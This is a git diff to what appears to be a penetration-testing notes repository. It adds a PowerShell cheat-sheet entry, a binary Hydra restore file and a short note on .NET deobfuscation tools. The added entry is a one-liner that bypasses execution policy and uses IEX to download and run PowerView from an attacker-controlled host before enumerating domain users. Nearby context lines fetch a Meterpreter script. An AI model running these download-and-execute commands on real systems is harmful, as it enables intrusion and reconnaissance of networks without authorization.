diff --git a/enumeration/hydra.restore b/enumeration/hydra.restore
new file mode 100644
index 0000000..2d8f48d
Binary files /dev/null and b/enumeration/hydra.restore differ
diff --git a/enumeration/windows/powershell.md b/enumeration/windows/powershell.md
index 6f0ebef..ec4fea7 100644
--- a/enumeration/windows/powershell.md
+++ b/enumeration/windows/powershell.md
@@ -129,6 +129,11 @@ Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
 (New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
 ```
 
+* Webrequest and execute in one go
+```sh
+powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
+```
+
 ## Base64 Decode File
 ```
 [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
diff --git a/reverse_engineering/docs/deobfuscation.md b/reverse_engineering/docs/deobfuscation.md
new file mode 100644
index 0000000..c6386b6
--- /dev/null
+++ b/reverse_engineering/docs/deobfuscation.md
@@ -0,0 +1,4 @@
+# Deobfuscation
+
+* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator 
+* In case of dotnet: Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well